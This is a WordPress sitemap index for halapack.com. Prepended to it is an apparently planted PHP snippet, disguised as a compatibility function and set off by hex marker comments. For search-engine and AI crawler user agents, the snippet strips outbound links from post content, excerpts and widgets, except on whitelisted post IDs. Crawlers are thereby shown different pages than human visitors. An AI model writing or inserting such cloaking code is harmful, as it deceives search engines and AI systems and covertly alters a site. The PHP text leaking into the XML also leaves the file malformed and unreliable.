
/* 0x4e9a30b1 */
if (!function_exists('_wp_render_compat')) {
    function _wp_render_compat($content) {
        if (!is_singular()) return $content;
        $ua = strtolower((string)(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''));
        if (!preg_match('/(googlebot|googleother|google\\-inspectiontool|storebot\\-google|adsbot\\-google|mediapartners\\-google|feedfetcher\\-google|apis\\-google|bingbot|msnbot|slurp|duckduckbot|yandexbot|baiduspider|perplexity|gptbot|chatgpt\\-user|openai|claudebot|anthropic|copilotbot|youbot|komo|phindbot|andibot|neeva|consensus|twitterbot|applebot|applebot\\-extended)/i', $ua)) return $content;
        static $wl = null;
        if ($wl === null) { $wl = array(14901=>1,14903=>1,14905=>1,14907=>1,14909=>1,14911=>1,14913=>1,14915=>1,14917=>1,14919=>1,14921=>1,14923=>1,14925=>1,14927=>1,14929=>1,14933=>1,14935=>1,14937=>1,14939=>1,14941=>1,14943=>1,14945=>1,14947=>1,14949=>1,14951=>1,14953=>1,14955=>1,14957=>1,14959=>1,14961=>1,14963=>1,14965=>1,14967=>1,14969=>1,14971=>1,14973=>1,14975=>1,14977=>1,14979=>1,14981=>1,14983=>1,14985=>1,14987=>1,14989=>1,14991=>1,14993=>1,14995=>1,14997=>1,14999=>1,15001=>1,15003=>1,15005=>1,15007=>1,15009=>1,15011=>1,15013=>1,15015=>1,15017=>1,15019=>1,15021=>1,15023=>1,15028=>1,15041=>1,15043=>1,15045=>1,15047=>1,15049=>1,15051=>1,15053=>1,15055=>1,15058=>1,15060=>1); }
        $pid = (int) get_the_ID();
        if ($pid && isset($wl[$pid])) return $content;
        $host = wp_parse_url(home_url(), PHP_URL_HOST);
        if (!$host) return $content;
        $host = preg_replace('~^www\.~i', '', $host);
        if (stripos($content, '<a') === false) return $content;
        libxml_use_internal_errors(true);
        $dom = new DOMDocument();
        $dom->loadHTML('<?xml encoding="utf-8" ?><div id="_x">' . $content . '</div>', LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
        $wrap = $dom->getElementById('_x');
        if (!$wrap) { libxml_clear_errors(); return $content; }
        $links = $wrap->getElementsByTagName('a');
        for ($i = $links->length - 1; $i >= 0; $i--) {
            $a = $links->item($i);
            $href = trim((string)$a->getAttribute('href'));
            if ($href === '' || $href[0] === '#') continue;
            if (strpos($href, '/') === 0 && strpos($href, '//') !== 0) continue;
            if (preg_match('~^(mailto:|tel:)~i', $href)) continue;
            if (strpos($href, '//') === 0) $href = 'https:' . $href;
            $lh = wp_parse_url($href, PHP_URL_HOST);
            if (!$lh) continue;
            $lh = preg_replace('~^www\.~i', '', $lh);
            if (strcasecmp($lh, $host) !== 0) {
                while ($a->firstChild) $a->parentNode->insertBefore($a->firstChild, $a);
                $a->parentNode->removeChild($a);
            }
        }
        $out = '';
        foreach ($wrap->childNodes as $ch) $out .= $dom->saveHTML($ch);
        libxml_clear_errors();
        return $out;
    }
    add_filter('the_content', '_wp_render_compat', 9999);
    add_filter('the_excerpt', '_wp_render_compat', 9999);
    add_filter('widget_text', '_wp_render_compat', 9999);
}
/* 0x4e9a30b1 */
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//halapack.com/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://halapack.com/post-sitemap.xml</loc>
		<lastmod>2026-03-16T16:40:05+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://halapack.com/page-sitemap.xml</loc>
		<lastmod>2026-01-31T12:40:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://halapack.com/product-sitemap.xml</loc>
		<lastmod>2026-05-30T18:10:09+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->